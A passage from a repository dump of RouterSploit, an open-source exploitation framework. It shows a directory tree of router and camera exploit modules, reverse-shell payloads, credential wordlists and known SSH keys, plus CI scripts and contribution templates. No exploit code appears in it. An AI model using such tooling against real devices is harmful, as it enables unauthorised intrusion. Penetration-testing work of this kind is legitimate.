│ ├── hg532_rce.py │ │ │ │ └── hg866_password_change.py │ │ │ ├── ipfire/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ipfire_oinkcode_rce.py │ │ │ │ ├── ipfire_proxy_rce.py │ │ │ │ └── ipfire_shellshock.py │ │ │ ├── lg/ │ │ │ │ ├── __init__.py │ │ │ │ └── nas_3718.py │ │ │ ├── linksys/ │ │ │ │ ├── 1500_2500_rce.py │ │ │ │ ├── __init__.py │ │ │ │ ├── eseries_themoon_rce.py │ │ │ │ ├── smartwifi_password_disclosure.py │ │ │ │ ├── wap54gv3_rce.py │ │ │ │ └── wrt100_110_rce.py │ │ │ ├── mikrotik/ │ │ │ │ ├── __init__.py │ │ │ │ ├── routeros_jailbreak.py │ │ │ │ └── winbox_auth_bypass_creds_disclosure.py │ │ │ ├── movistar/ │ │ │ │ ├── __init__.py │ │ │ │ └── 
adsl_router_bhs_rta_path_traversal.py │ │ │ ├── multi/ │ │ │ │ ├── __init__.py │ │ │ │ ├── gpon_home_gateway_rce.py │ │ │ │ ├── misfortune_cookie.py │ │ │ │ ├── rom0.py │ │ │ │ ├── tcp_32764_info_disclosure.py │ │ │ │ └── tcp_32764_rce.py │ │ │ ├── netcore/ │ │ │ │ ├── __init__.py │ │ │ │ └── udp_53413_rce.py │ │ │ ├── netgear/ │ │ │ │ ├── __init__.py │ │ │ │ ├── dgn2200_dnslookup_cgi_rce.py │ │ │ │ ├── dgn2200_ping_cgi_rce.py │ │ │ │ ├── jnr1010_path_traversal.py │ │ │ │ ├── multi_password_disclosure-2017-5521.py │ │ │ │ ├── multi_rce.py │ │ │ │ ├── n300_auth_bypass.py │ │ │ │ ├── prosafe_rce.py │ │ │ │ ├── r7000_r6400_rce.py │ │ │ │ ├── rax30_rce.py │ │ │ │ └── wnr500_612v3_jnr1010_2010_path_traversal.py │ │ │ ├── netsys/ │ │ │ │ ├── __init__.py │ │ │ │ └── multi_rce.py │ │ │ ├── shuttle/ │ │ │ │ ├── 915wm_dns_change.py │ │ │ │ └── __init__.py │ │ │ ├── technicolor/ │ │ │ │ ├── __init__.py │ │ │ │ ├── dwg855_authbypass.py │ │ │ │ ├── tc7200_password_disclosure.py │ │ │ │ ├── tc7200_password_disclosure_v2.py │ │ │ │ └── tg784_authbypass.py │ │ │ ├── thomson/ │ │ │ │ ├── __init__.py │ │ │ │ ├── twg849_info_disclosure.py │ │ │ │ └── twg850_password_disclosure.py │ │ │ ├── tplink/ │ │ │ │ ├── __init__.py │ │ │ │ ├── archer_c2_c20i_rce.py │ │ │ │ ├── archer_c9_admin_password_reset.py │ │ │ │ ├── wdr740nd_wdr740n_backdoor.py │ │ │ │ ├── wdr740nd_wdr740n_path_traversal.py │ │ │ │ └── wdr842nd_wdr842n_configure_disclosure.py │ │ │ ├── ubiquiti/ │ │ │ │ ├── __init__.py │ │ │ │ └── airos_6_x.py │ │ │ ├── zte/ │ │ │ │ ├── __init__.py │ │ │ │ ├── f460_f660_backdoor.py │ │ │ │ ├── zxhn_h108n_wifi_password_disclosure.py │ │ │ │ └── zxv10_rce.py │ │ │ └── zyxel/ │ │ │ ├── __init__.py │ │ │ ├── d1000_rce.py │ │ │ ├── d1000_wifi_password_disclosure.py │ │ │ ├── p660hn_t_v1_rce.py │ │ │ ├── p660hn_t_v2_rce.py │ │ │ └── zywall_usg_extract_hashes.py │ │ ├── generic/ │ │ │ ├── __init__.py │ │ │ ├── bluetooth/ │ │ │ │ ├── __init__.py │ │ │ │ ├── btle_enumerate.py │ │ │ │ ├── 
btle_scan.py │ │ │ │ └── btle_write.py │ │ │ └── upnp/ │ │ │ ├── __init__.py │ │ │ └── ssdp_msearch.py │ │ ├── payloads/ │ │ │ ├── __init__.py │ │ │ ├── armle/ │ │ │ │ ├── __init__.py │ │ │ │ ├── bind_tcp.py │ │ │ │ └── reverse_tcp.py │ │ │ ├── cmd/ │ │ │ │ ├── __init__.py │ │ │ │ ├── awk_bind_tcp.py │ │ │ │ ├── awk_bind_udp.py │ │ │ │ ├── awk_reverse_tcp.py │ │ │ │ ├── bash_reverse_tcp.py │ │ │ │ ├── netcat_bind_tcp.py │ │ │ │ ├── netcat_reverse_tcp.py │ │ │ │ ├── perl_bind_tcp.py │ │ │ │ ├── perl_reverse_tcp.py │ │ │ │ ├── php_bind_tcp.py │ │ │ │ ├── php_reverse_tcp.py │ │ │ │ ├── python_bind_tcp.py │ │ │ │ ├── python_bind_udp.py │ │ │ │ ├── python_reverse_tcp.py │ │ │ │ └── python_reverse_udp.py │ │ │ ├── mipsbe/ │ │ │ │ ├── __init__.py │ │ │ │ ├── bind_tcp.py │ │ │ │ └── reverse_tcp.py │ │ │ ├── mipsle/ │ │ │ │ ├── __init__.py │ │ │ │ ├── bind_tcp.py │ │ │ │ └── reverse_tcp.py │ │ │ ├── perl/ │ │ │ │ ├── __init__.py │ │ │ │ ├── bind_tcp.py │ │ │ │ └── reverse_tcp.py │ │ │ ├── php/ │ │ │ │ ├── __init__.py │ │ │ │ ├── bind_tcp.py │ │ │ │ └── reverse_tcp.py │ │ │ ├── python/ │ │ │ │ ├── __init__.py │ │ │ │ ├── bind_tcp.py │ │ │ │ ├── bind_udp.py │ │ │ │ ├── reverse_tcp.py │ │ │ │ └── reverse_udp.py │ │ │ ├── x64/ │ │ │ │ ├── __init__.py │ │ │ │ ├── bind_tcp.py │ │ │ │ └── reverse_tcp.py │ │ │ └── x86/ │ │ │ ├── __init__.py │ │ │ ├── bind_tcp.py │ │ │ └── reverse_tcp.py │ │ └── scanners/ │ │ ├── __init__.py │ │ ├── autopwn.py │ │ ├── cameras/ │ │ │ ├── __init__.py │ │ │ └── camera_scan.py │ │ ├── misc/ │ │ │ ├── __init__.py │ │ │ └── misc_scan.py │ │ └── routers/ │ │ ├── __init__.py │ │ └── router_scan.py │ └── resources/ │ ├── __init__.py │ ├── ssh_keys/ │ │ ├── array-networks-vapv-vxag.json │ │ ├── array-networks-vapv-vxag.key │ │ ├── barracuda_load_balancer_vm.json │ │ ├── barracuda_load_balancer_vm.key │ │ ├── ceragon-fibeair-cve-2015-0936.json │ │ ├── ceragon-fibeair-cve-2015-0936.key │ │ ├── exagrid-cve-2016-1561.json │ │ ├── exagrid-cve-2016-1561.key │ │ ├── 
f5-bigip-cve-2012-1493.json │ │ ├── f5-bigip-cve-2012-1493.key │ │ ├── loadbalancer.org-enterprise-va.json │ │ ├── loadbalancer.org-enterprise-va.key │ │ ├── monroe-dasdec-cve-2013-0137.json │ │ ├── monroe-dasdec-cve-2013-0137.key │ │ ├── quantum-dxi-v1000.json │ │ ├── quantum-dxi-v1000.key │ │ ├── vagrant.json │ │ └── vagrant.key │ └── wordlists/ │ ├── __init__.py │ ├── defaults.txt │ ├── passwords.txt │ ├── snmp.txt │ └── usernames.txt ├── rsf.py ├── setup.py └── tests/ ├── __init__.py ├── conftest.py ├── core/ │ ├── __init__.py │ └── test_option.py ├── creds/ │ ├── __init__.py │ ├── cameras/ │ │ ├── __init__.py │ │ ├── acti/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ ├── test_telnet_default_creds.py │ │ │ └── test_webinterface_default_creds.py │ │ ├── american_dynamics/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── arecont/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── avigilon/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── avtech/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── axis/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ ├── test_telnet_default_creds.py │ │ │ └── test_webinterface_http_auth_default_creds.py │ │ ├── basler/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ ├── test_telnet_default_creds.py │ │ │ └── test_webinterface_default_creds.py │ │ ├── brickcom/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ ├── test_telnet_default_creds.py │ │ │ └── 
test_webinterface_http_auth_default_creds.py │ │ ├── canon/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ ├── test_telnet_default_creds.py │ │ │ └── test_webinterface_default_creds.py │ │ ├── cisco/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── dlink/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── geovision/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── grandstream/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── hikvision/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── honeywell/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── iqinvision/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── jvc/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── mobotix/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── samsung/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── sentry360/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── siemens/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── 
test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── speco/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── stardot/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── vacron/ │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ └── videoiq/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ ├── generic/ │ │ ├── test_ftp_bruteforce.py │ │ ├── test_ftp_default.py │ │ ├── test_http_basic_digest_bruteforce.py │ │ ├── test_http_basic_digest_default.py │ │ ├── test_snmp_bruteforce.py │ │ ├── test_ssh_bruteforce.py │ │ ├── test_ssh_default.py │ │ ├── test_telnet_bruteforce.py │ │ └── test_telnet_default.py │ └── routers/ │ ├── 2wire/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ ├── 3com/ │ │ ├── __init__.py │ │ ├── test_3com_ftp_default_creds.py │ │ ├── test_3com_ssh_default_creds.py │ │ └── test_3com_telnet_default_creds.py │ ├── __init__.py │ ├── asmax/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ ├── test_telnet_default_creds.py │ │ └── test_webinterface_http_auth_default_creds.py │ ├── asus/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ ├── belkin/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ ├── bhu/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ ├── billion/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py 
│ │ └── test_telnet_default_creds.py │ ├── cisco/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ ├── comtrend/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ ├── dlink/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ ├── fortinet/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ ├── huawei/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ ├── ipfire/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ ├── juniper/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ ├── linksys/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ ├── mikrotik/ │ │ ├── __init__.py │ │ ├── test_api_ros_default_creds.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ ├── movistar/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ ├── netcore/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ ├── netgear/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ ├── netsys/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ ├── pfsense/ │ │ ├── __init__.py │ │ └── test_ssh_default_creds.py │ ├── technicolor/ │ │ ├── __init__.py 
│ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ ├── thomson/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ ├── tplink/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ ├── ubiquiti/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ ├── zte/ │ │ ├── __init__.py │ │ ├── test_ftp_default_creds.py │ │ ├── test_ssh_default_creds.py │ │ └── test_telnet_default_creds.py │ └── zyxel/ │ ├── __init__.py │ ├── test_ftp_default_creds.py │ ├── test_ssh_default_creds.py │ └── test_telnet_default_creds.py ├── encoders/ │ ├── __init__.py │ ├── perl/ │ │ ├── __init__.py │ │ ├── test_base64.py │ │ └── test_hex.py │ ├── php/ │ │ ├── __init__.py │ │ ├── test_base64.py │ │ └── test_hex.py │ └── python/ │ ├── __init__.py │ ├── test_base64.py │ └── test_hex.py ├── exploits/ │ ├── __init__.py │ ├── cameras/ │ │ ├── __init__.py │ │ ├── avigilon/ │ │ │ ├── __init__.py │ │ │ └── test_videoiq_camera_path_traversal.py │ │ ├── brickcom/ │ │ │ ├── __init__.py │ │ │ ├── test_corp_network_cameras_conf_disclosure.py │ │ │ └── test_users_cgi_creds_disclosure.py │ │ ├── cisco/ │ │ │ ├── __init__.py │ │ │ └── test_video_surv_path_traversal.py │ │ ├── dlink/ │ │ │ ├── __init__.py │ │ │ └── test_dcs_930l_932l_auth_bypass.py │ │ ├── honeywell/ │ │ │ ├── __init__.py │ │ │ └── test_hicc_1100pt_password_disclosure.py │ │ ├── jovision/ │ │ │ ├── __init__.py │ │ │ └── test_jovision_camera_credential_disclosure.py │ │ ├── multi/ │ │ │ ├── __init__.py │ │ │ ├── test_cctv_dvr_rce.py │ │ │ ├── test_dvr_creds_disclosure.py │ │ │ ├── test_jvc_vanderbilt_honeywell_path_traversal.py │ │ │ └── test_netwave_ip_camera_information_disclosure.py │ │ ├── mvpower/ │ │ │ ├── __init__.py │ │ │ └── test_dvr_jaws_rce.py │ │ ├── siemens/ │ 
│ │ ├── __init__.py │ │ │ └── test_cvms2025_credentials_disclosure.py │ │ └── xiongmai/ │ │ ├── __init__.py │ │ └── test_uc_httpd_path_traversal.py │ ├── misc/ │ │ ├── __init__.py │ │ ├── asus/ │ │ │ └── test_b1m_projector_rce.py │ │ ├── miele/ │ │ │ ├── __init__.py │ │ │ └── test_pg8528_path_traversal.py │ │ └── wepresent/ │ │ ├── __init__.py │ │ └── test_wipg1000_rce.py │ └── routers/ │ ├── 2wire/ │ │ ├── __init__.py │ │ ├── test_4011g_5012nv_path_traversal.py │ │ └── test_gateway_auth_bypass.py │ ├── 3com/ │ │ ├── __init__.py │ │ ├── test_ap8760_password_disclosure.py │ │ ├── test_imc_info_disclosure.py │ │ ├── test_imc_path_traversal.py │ │ ├── test_officeconnect_info_disclosure.py │ │ └── test_officeconnect_rce.py │ ├── __init__.py │ ├── asmax/ │ │ ├── __init__.py │ │ ├── test_ar_1004g_password_disclosure.py │ │ └── test_ar_804_gu_rce.py │ ├── asus/ │ │ ├── __init__.py │ │ ├── test_asuswrt_lan_rce.py │ │ ├── test_infosvr_backdoor_rce.py │ │ └── test_rt_n16_password_disclosure.py │ ├── belkin/ │ │ ├── __init__.py │ │ ├── test_auth_bypass.py │ │ ├── test_g_n150_password_disclosure.py │ │ ├── test_g_plus_info_disclosure.py │ │ ├── test_n150_path_traversal.py │ │ ├── test_n750_rce.py │ │ └── test_play_mac_prce.py │ ├── bhu/ │ │ ├── __init__.py │ │ └── test_bhu_urouter_rce.py │ ├── billion/ │ │ ├── __init__.py │ │ ├── test_billion_5200w_rce.py │ │ └── test_billion_7700n4_password_disclosure.py │ ├── cisco/ │ │ ├── __init__.py │ │ ├── test_dpc2420_info_disclosure.py │ │ ├── test_firepower_management60_path_traversal.py │ │ ├── test_firepower_management60_rce.py │ │ ├── test_ios_http_authorization_bypass.py │ │ ├── test_rv320_command_injection.py │ │ ├── test_secure_acs_bypass.py │ │ ├── test_ucm_info_disclosure.py │ │ ├── test_ucs_manager_rce.py │ │ └── test_unified_multi_path_traversal.py │ ├── comtrend/ │ │ ├── __init__.py │ │ └── test_ct_5361t_password_disclosure.py │ ├── dlink/ │ │ ├── __init__.py │ │ ├── test_dcs_930l_auth_rce.py │ │ ├── 
test_dir_300_320_600_615_info_disclosure.py │ │ ├── test_dir_300_320_615_auth_bypass.py │ │ ├── test_dir_300_600_rce.py │ │ ├── test_dir_300_645_815_upnp_rce.py │ │ ├── test_dir_645_815_rce.py │ │ ├── test_dir_645_password_disclosure.py │ │ ├── test_dir_655_866_652_rce.py │ │ ├── test_dir_815_850l_rce.py │ │ ├── test_dir_825_path_traversal.py │ │ ├── test_dir_850l_creds_disclosure.py │ │ ├── test_dir_8xx_password_disclosure.py │ │ ├── test_dns_320l_327l_rce.py │ │ ├── test_dsl_2730_2750_path_traversal.py │ │ ├── test_dsl_2730b_2780b_526b_dns_change.py │ │ ├── test_dsl_2750b_info_disclosure.py │ │ ├── test_dsl_2750b_rce.py │ │ ├── test_dsp_w110_rce.py │ │ ├── test_dvg_n5402sp_path_traversal.py │ │ ├── test_dwl_3200ap_password_disclosure.py │ │ ├── test_dwr_932_info_disclosure.py │ │ ├── test_dwr_932b_backdoor.py │ │ ├── test_multi_hedwig_cgi_exec.py │ │ └── test_multi_hnap_rce.py │ ├── huawei/ │ │ ├── __init__.py │ │ ├── test_e5331_mifi_info_disclosure.py │ │ ├── test_hg520_info_disclosure.py │ │ ├── test_hg530_hg520b_password_disclosure.py │ │ └── test_hg866_password_change.py │ ├── ipfire/ │ │ ├── __init__.py │ │ ├── test_ipfire_proxy_rce.py │ │ └── test_ipfire_shellshock.py │ ├── linksys/ │ │ ├── __init__.py │ │ ├── test_1500_2500_rce.py │ │ ├── test_eseries_themoon_rce.py │ │ ├── test_smartwifi_password_disclosure.py │ │ ├── test_wap54gv3_rce.py │ │ └── test_wrt100_110_rce.py │ ├── mikrotik/ │ │ ├── __init__.py │ │ └── test_winbox_auth_bypass_creds_disclosure.py │ ├── movistar/ │ │ ├── __init__.py │ │ └── test_adsl_router_bhs_rta_path_traversal.py │ ├── multi/ │ │ ├── __init__.py │ │ ├── test_gpon_home_gateway_rce.py │ │ ├── test_misfortune_cookie.py │ │ ├── test_rom0.py │ │ ├── test_tcp_32764_info_disclosure.py │ │ └── test_tcp_32764_rce.py │ ├── netcore/ │ │ ├── __init__.py │ │ └── test_udp_53413_rce.py │ ├── netgear/ │ │ ├── __init__.py │ │ ├── test_dgn2200_ping_cgi_rce.py │ │ ├── test_jnr1010_path_traversal.py │ │ ├── test_n300_auth_bypass.py │ │ ├── 
test_netgear_multi_rce.py │ │ ├── test_prosafe_rce.py │ │ ├── test_r7000_r6400_rce.py │ │ └── test_wnr500_612v3_jnr1010_2010_path_traversal.py │ ├── netsys/ │ │ ├── __init__.py │ │ └── test_multi_rce.py │ ├── shuttle/ │ │ ├── __init__.py │ │ └── test_915wm_dns_change.py │ ├── technicolor/ │ │ ├── __init__.py │ │ ├── test_dwg855_authbypass.py │ │ ├── test_tc7200_password_disclosure.py │ │ ├── test_tc7200_password_disclosure_v2.py │ │ └── test_tg784_authbypass.py │ ├── thomson/ │ │ ├── __init__.py │ │ └── test_twg850_password_disclosure.py │ ├── tplink/ │ │ ├── __init__.py │ │ ├── test_archer_c2_c20i_rce.py │ │ ├── test_wdr740nd_wdr740n_backdoor.py │ │ ├── test_wdr740nd_wdr740n_path_traversal.py │ │ └── test_wdr842nd_wdr842n_configure_disclosure.py │ ├── zte/ │ │ ├── __init__.py │ │ ├── test_f460_f660_backdoor.py │ │ ├── test_zxhn_h108n_wifi_password_disclosure.py │ │ └── test_zxv10_rce.py │ └── zyxel/ │ ├── __init__.py │ ├── test_d1000_rce.py │ ├── test_d1000_wifi_password_disclosure.py │ ├── test_p660hn_t_v1_rce.py │ ├── test_p660hn_t_v2_rce.py │ └── test_zywall_usg_extract_hashes.py ├── generic/ │ ├── __init__.py │ └── upnp/ │ └── test_ssdp_msearch.py ├── payloads/ │ ├── __init__.py │ ├── armle/ │ │ ├── __init__.py │ │ ├── test_bind_tcp.py │ │ └── test_reverse_tcp.py │ ├── cmd/ │ │ ├── __init__.py │ │ ├── test_awk_bind_tcp.py │ │ ├── test_awk_bind_udp.py │ │ ├── test_awk_reverse_tcp.py │ │ ├── test_bash_reverse_tcp.py │ │ ├── test_netcat_bind_tcp.py │ │ ├── test_netcat_reverse_tcp.py │ │ ├── test_perl_bind_tcp.py │ │ ├── test_perl_reverse_tcp.py │ │ ├── test_php_bind_tcp.py │ │ ├── test_php_reverse_tcp.py │ │ ├── test_python_bind_tcp.py │ │ ├── test_python_bind_udp.py │ │ ├── test_python_reverse_tcp.py │ │ └── test_python_reverse_udp.py │ ├── mipsbe/ │ │ ├── __init__.py │ │ ├── test_bind_tcp.py │ │ └── test_reverse_tcp.py │ ├── mipsle/ │ │ ├── __init__.py │ │ ├── test_bind_tcp.py │ │ └── test_reverse_tcp.py │ ├── perl/ │ │ ├── test_bind_tcp.py │ │ └── 
test_reverse_tcp.py │ ├── php/ │ │ ├── __init__.py │ │ ├── test_bind_tcp.py │ │ └── test_reverse_tcp.py │ ├── python/ │ │ ├── __init__.py │ │ ├── test_bind_tcp.py │ │ ├── test_bind_udp.py │ │ ├── test_reverse_tcp.py │ │ └── test_reverse_udp.py │ ├── x64/ │ │ ├── __init__.py │ │ ├── test_bind_tcp.py │ │ └── test_reverse_tcp.py │ └── x86/ │ ├── __init__.py │ ├── test_bind_tcp.py │ └── test_reverse_tcp.py ├── test_exploit_scenarios.py └── test_module_info.py ================================================ FILE CONTENTS ================================================ ================================================ FILE: .dockerignore ================================================ .idea/ .travis/ README.md LICENSE .travis.yml *.pyc *.log ================================================ FILE: .github/ISSUE_TEMPLATE.md ================================================ ! ANY INCOMPLETE REPORT WILL BE CLOSED RIGHT AWAY ! ## Steps to Reproduce (for bugs) 1. 2. 3. 4. ## Your Environment * RouterSploit Version used: * Operating System and version: * Python Version: ( `python3 --version` ) * Python Environment: ( `python3 -m pip freeze` ) ## Current Behavior * If describing a bug, tell us what happens instead of the expected behavior * If suggesting a change/improvement, tell us how it works right now ## Expected Behavior * If you're describing a bug, tell us what should happen * If you're suggesting a change/improvement, tell us how it should work ================================================ FILE: .github/PULL_REQUEST_TEMPLATE.md ================================================ ## Status **READY/IN DEVELOPMENT/HOLD** ## Description Describe what is changed by your Pull Request. If this PR is related to the open issue (bug/feature/new module) please attach issue number. ## Verification Provide steps to test or reproduce the PR. 1. Start `./rsf.py` 2. `use exploits/routers/dlink/dsl_2750b_rce` 3. `set target 192.168.1.1` 4. `run` 5. ... 
## Checklist - [ ] Write module/feature - [ ] Write tests ([Example](https://github.com/threat9/routersploit/blob/master/tests/exploits/routers/dlink/test_dsl_2750b_rce.py)) - [ ] Document how it works ([Example](https://github.com/threat9/routersploit/blob/master/docs/modules/exploits/routers/dlink/dsl_2750b_rce.md)) ================================================ FILE: .gitignore ================================================ # IntelliJ project files .idea out gen # Byte-compiled / optimized / DLL files __pycache__/ *.py[cod] *$py.class # C extensions *.so # Distribution / packaging .Python env/ build/ develop-eggs/ dist/ downloads/ eggs/ .eggs/ lib64/ parts/ sdist/ var/ *.egg-info/ .installed.cfg *.egg # PyInstaller # Usually these files are written by a python script from a template # before PyInstaller builds the exe, so as to inject date/other infos into it. *.manifest *.spec # Installer logs pip-log.txt pip-delete-this-directory.txt # Unit test / coverage reports htmlcov/ .tox/ .coverage .coverage.* .cache .pytest_cache nosetests.xml coverage.xml *,cover # Translations *.mo *.pot # Django stuff: *.log # Sphinx documentation docs/_build/ # PyBuilder target/ # VS Code .vscode # virtualenv venv/ # macOS .DS_Store .DS_Store? 
# vim *.swp *.swo # Pipenv files Pipfile Pipfile.lock ================================================ FILE: .travis/install.sh ================================================ #!/bin/bash set -e set -x if [[ "$(uname -s)" == 'Darwin' ]]; then sw_vers git clone --depth 1 https://github.com/yyuu/pyenv.git ~/.pyenv PYENV_ROOT="$HOME/.pyenv" PATH="$PYENV_ROOT/bin:$PATH" eval "$(pyenv init -)" pyenv install $PYTHON_VERSION pyenv global $PYTHON_VERSION pyenv rehash pip install --user virtualenv python -m virtualenv ~/.venv source ~/.venv/bin/activate fi python -m pip install --upgrade pip python -m pip install -r requirements-dev.txt ================================================ FILE: .travis/run.sh ================================================ #!/bin/bash set -e set -x if [[ "$(uname -s)" == "Darwin" ]]; then PYENV_ROOT="$HOME/.pyenv" PATH="$PYENV_ROOT/bin:$PATH" eval "$(pyenv init -)" source ~/.venv/bin/activate fi make lint tests ================================================ FILE: .travis.yml ================================================ language: python matrix: include: - os: linux python: 3.6 - os: osx language: generic env: PYTHON_VERSION=3.6.1 install: - "./.travis/install.sh" script: - "./.travis/run.sh" ================================================ FILE: CONTRIBUTING.md ================================================ # Contribution Guidelines There are many ways to contribute to RouterSploit project, and the routersploit team is grateful for all contributions. This overview summarizes the most important steps to get you started as a contributor. * Report bugs to the routersploit issue tracker. * Make suggestions for changes, updates, or new features to the routersploit issue tracker. * Contribute bug fixes, example code, documentation, or tutorials to routersploit. * Contribute new features to routersploit. 
## Bug reports When submitting bug reports, please consider providing the following information: * Reproduction steps: step by step description to reproduce the problem. * Expected: Describe the behavior you expect. * Actual: Describe the behavior you see. ## Testing It is hard to test modules in all possible scenarios. If you would like to help: 1. Check what device you have - identify vendor and version. 2. Check if routersploit contains exploits for the device you possess. 3. If an exploit does not work but it should, check "show info" for more information. References should provide you with links to proof of concept exploits. Example: ``` References: - https://www.exploit-db.com/exploits/24975/ ``` 4. Try to use the proof of concept exploit and check if it works properly. If it does, feel free to create a new bug issue explaining that the routersploit module does not work properly. ## Development * [Creating exploit module](https://github.com/reverse-shell/routersploit/wiki/Creating-Exploit) * [Creating creds module](https://github.com/reverse-shell/routersploit/wiki/Creating-Creds) * [Creating scanner module](https://github.com/reverse-shell/routersploit/wiki/Creating-Scanner) ================================================ FILE: Dockerfile ================================================ FROM python:3.9-bookworm WORKDIR /routersploit RUN useradd rts -U -m && \ chown -R rts:rts 